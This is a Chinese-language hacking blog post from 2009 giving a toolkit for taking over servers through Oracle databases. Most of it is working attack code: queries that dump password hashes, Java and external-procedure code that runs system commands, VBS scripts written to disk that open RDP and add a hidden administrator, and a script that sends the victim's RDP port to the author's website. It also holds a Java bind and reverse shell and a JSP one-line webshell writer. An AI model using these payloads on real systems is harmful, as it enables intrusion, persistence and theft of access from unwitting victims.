2009-5
31
作者:Robert
配合open那个工具
第一部分
基本查询指令
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限
select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee=’SYSTEM’;\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name=’SCOTT’; //低版本查看单用户密码
Select username,decode(password,NULL,’NULL’,password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
Create ROLE “javauserpriv” NOT IDENTIFIED
Create ROLE “javasyspriv” NOT IDENTIFIED \\当提示role ‘JAVASYSPRIV’ does not exist使用
select grantee from dba_role_privs where granted_role=’DBA’; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录
第二部分,创建java,执行系统命令
no.1
Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors |
上面这个没有回显的
如果不行可以使用下面这个
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors |
执行完后
执行
exec oracmd.exec (‘net1 user robert iloveyou /add’);
no2.
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS import java.io.*; public class Host { public static void executeCommand(String command) { try { String[] finalCommand; if (isWindows()) { finalCommand = new String[4]; // Use the appropriate path for your windows version. finalCommand[0] = "C:\\windows\\system32\\cmd.exe"; // Windows XP/2003 //finalCommand[0] = "C:\\winnt\\system32\\cmd.exe"; // Windows NT/2000 finalCommand[1] = "/y"; finalCommand[2] = "/c"; finalCommand[3] = command; } else { finalCommand = new String[3]; finalCommand[0] = "/bin/sh"; finalCommand[1] = "-c"; finalCommand[2] = command; } final Process pr = Runtime.getRuntime().exec(finalCommand); pr.waitFor(); new Thread(new Runnable(){ public void run() { BufferedReader br_in = null; try { br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); String buff = null; while ((buff = br_in.readLine()) != null) { System.out.println("Process out :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_in.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process output."); ioe.printStackTrace(); } finally { try { br_in.close(); } catch (Exception ex) {} } } }).start(); new Thread(new Runnable(){ public void run() { BufferedReader br_err = null; try { br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); String buff = null; while ((buff = br_err.readLine()) != null) { System.out.println("Process err :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_err.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process error."); ioe.printStackTrace(); } finally { try { br_err.close(); } catch (Exception ex) {} } } }).start(); } catch (Exception ex) { System.out.println(ex.getLocalizedMessage()); } } public static boolean isWindows() { if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) return true; else return false; } }; / Create or REPLACE PROCEDURE host_command (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME 'Host.executeCommand (java.lang.String)'; / EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete'); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); / DECLARE l_output DBMS_OUTPUT.chararr; l_lines INTEGER := 1000; BEGIN DBMS_OUTPUT.enable(1000000); DBMS_JAVA.set_output(1000000); host_command('dir C:\'); DBMS_OUTPUT.get_lines(l_output, l_lines); END; |
这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的
host_command(‘dir C:\’);
no3.
create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try { Process p = rt.exec(args); int bufSize = 4096; BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis.read(buffer, 0, bufSize)) != -1) System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace(); RC = -1; } finally { return RC; } } } / create or replace function RUN_CMz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; / create or replace procedure RC(p_cmd in varChar) as x number; begin x := RUN_CMz(p_cmd); end; / variable x number; set serveroutput on; exec dbms_java.set_output(100000); grant javasyspriv to system; |
这句注意最后这里要授权下当前登陆的用户
grant javasyspriv to system
最后执行
exec 
:=run_cmz(‘ipconfig’);
第二部分 操作磁盘文件
no1.
建立目录
create or replace directory DIR as ‘C:\’;
此目录当然也可以是启动目录
授权
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了
这步操作讲下载我的木马到c盘并执行
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', '3389.vbs', 'W'); utl_file.put_line(file, 'Dim OperationRegistry Set OperationRegistry=WScript.createObject("WScript.Shell") Dim TSPort,TSState,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSPort=OperationRegistry.RegRead(TSRegPath) TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" TSState=OperationRegistry.RegRead(TSRegPath) If TSState=0 Then Else OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" End If'); utl_file.fflush(file); utl_file.fclose(file); end; / exec :x:=run_cmz('cscript c:\3389.vbs'); |
vbs开启3389
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', 'user.vbs', 'W'); utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"'||'&'||'wsnetwork.ComputerName Set oa=CreateObject("Scripting.FileSystemObject") Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","bob") od.SetPassword "123456abc!@#" od.SetInfo Set of=GetObject(os&"/bob",user) oe.add os&"/bob" oa.DeleteFile("user.vbs")'); utl_file.fflush(file); utl_file.fclose(file); end; / / exec :x:=run_cmz('cscript c:\user.vbs'); |
无net添加admin用户
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', '3389p.vbs', 'W'); utl_file.put_line(file, ' Dim OperationRegistry Set OperationRegistry=WScript.createObject("WScript.Shell") Dim TSPort,TSState,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSPort=OperationRegistry.RegRead(TSRegPath) Set xPost=CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0 xPost.Send() TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" TSState=OperationRegistry.RegRead(TSRegPath) If TSState=0 Then Else OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" End If set obj=wscript.createObject("wscript.shell") obj.Run("sc config TermService start= demand") obj.Run("sc stop TermService") obj.Run("sc start TermService") wscript.quit '); utl_file.fflush(file); utl_file.fclose(file); end; / exec :x:=run_cmz('cscript c:\3389p.vbs'); / exec :x:=run_cmz('del c:\3389p.vbs'); / http://blog.cnmoker.org/read3389/read.asp |
这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了
第三部分 linux的一些操作
linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结
create or replace and compile java source named bob as import java.io.*; import java.net.*; public class BOB{ public static String listFolder(String path){ File f=null; String str=""; f=new File(path); String[] files=f.list(); if(files!=null) for(int i=0;i<files .length;i++){ str+=files[i]+"\r\n"; } return str; } public static String saveFile(String filepath,String value){ FileOutputStream fos=null; try { fos=new FileOutputStream(filepath); fos.write(value.getBytes()); return "OK"; } catch (Exception e) { return e.getMessage(); } finally{ if(fos!=null){ try {fos.close();} catch (Exception e) {} } } } public static String readFile(String pathfile,String code){ BufferedReader br=null; String value=""; try { br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code)); String s=null; while((s=br.readLine())!=null){ value+=s; } return value; } catch (Exception e) { return e.getMessage(); } finally{ if(br!=null){try {br.close();} catch (IOException e) {}} } } public static String execFile(String filepath,String code){ int i=0; Runtime rt=Runtime.getRuntime(); String output=""; InputStreamReader isr = null; char[] bufferC=new char[1024]; try{ Process ps=rt.exec(filepath); isr=new InputStreamReader(ps.getInputStream(),code); while((i=isr.read(bufferC,0,bufferC.length))!=-1){ output+=new String(bufferC,0,i); } return output; }catch(Exception e){ return e.getMessage(); }finally{ if(isr!=null)try {isr.close();} catch (IOException e) {} } } public static String bindShell(int port){ ServerSocket ss=null; Socket s=null; try { ss = new ServerSocket(port); s=ss.accept(); new optShell(ss,s).start(); return "OK"; } catch (Exception e) { return e.getMessage(); } } public static String reverseShell(String host,int port){ Socket s=null; try{ s=new Socket(host,port); new optShell(null,s).start(); return "OK"; }catch(Exception e){ return e.getMessage(); } } //反弹shell的sqlj语句 public static class optShell extends Thread{ OutputStream os=null; InputStream is=null; ServerSocket ss; Socket s; public optShell(ServerSocket ss,Socket s){ this.ss=ss; this.s=s; try{ this.is=s.getInputStream(); this.os=s.getOutputStream(); }catch(Exception e){ if(os!=null)try {os.close();} catch(Exception ex) {} if(is!=null)try {is.close();} catch(Exception ex) {} if(s!=null)try {s.close();} catch(Exception ex) {} if(ss!=null)try {ss.close();} catch(Exception ex) {} } } public void run(){ BufferedReader br=new BufferedReader(new InputStreamReader(is)); String line=""; String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n"; try { //os.write(cmdhelp.getBytes()); line=br.readLine(); while(!"exit".equals(line)){ if(line.length()>3){ StringBuffer sb=new StringBuffer(line.trim()); String cmd=sb.substring(0, 4); if(cmd.equals("list")){ os.write("input you path:\r\n".getBytes()); line=br.readLine(); os.write(listFolder(line).getBytes()); }else if("save".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you value:\r\n".getBytes()); os.write(saveFile(line,br.readLine()).getBytes()); }else if("read".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(readFile(line,br.readLine()).getBytes()); }else if("exec".equals(cmd)){ os.write("input you run filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(execFile(line,br.readLine()).getBytes()); }else{ os.write(cmdhelp.getBytes()); } }else{ os.write(cmdhelp.getBytes()); } line=br.readLine(); } } catch (Exception e) { e.printStackTrace(); }finally{ if(os!=null)try {os.close();} catch(Exception e) {} if(is!=null)try {is.close();} catch(Exception e) {} if(s!=null)try {s.close();} catch(Exception e) {} if(ss!=null)try {ss.close();} catch(Exception e) {} } } } } / create or replace function BOB_LISTFOLDER(str varchar2) return varchar2 as language java name 'BOB.listFolder(java.lang.String) return java.lang.String'; / create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2 as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_READFILE(p varchar2,c varchar2) return varchar2 as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2 as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_BINDSHELL(port number) return varchar2 as language java name 'BOB.bindShell(int) return java.lang.String'; / begin Dbms_Java.Grant_Permission('scott','java.io.FilePermission','< <ALL FILES>>','read,write,execute,delete'); Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor'); Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve'); end; </files> |
这么一大段,仔细看
执行完后
Select BOB_LISTFOLDER('/usr') FROM DUAL //列目录 Select BOB_EXECFILE('C:\WINDOWS\system32\cmd.exe /c dir c:\','GBK') FROM DUAL; //执行命令 Select BOB_READFILE('/tmp/1.txt','GBK') FROM DUAL; //读文件 Select BOB_SAVEFILE('/tmp/1.jsp','< %if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>') FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去 |
其中本来还有reserver shell的
我还没来的及测试
我自己是更中意反弹shell的
特别是linux
好操作的多
再说有时候linux是nat出来的
反弹就去了许多麻烦
第四部分 技巧
一句话读取3389端口
exec :x:=run_cmz('REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'); |
一句话开3389 只合适win 2k3
exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'); |
删除pcanywhere导致的终端登陆错误
exec :x:=run_cmz('reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f'); |
感谢kj,和linx的文章.
最后说下,关于web injection部分
还没有任何评论。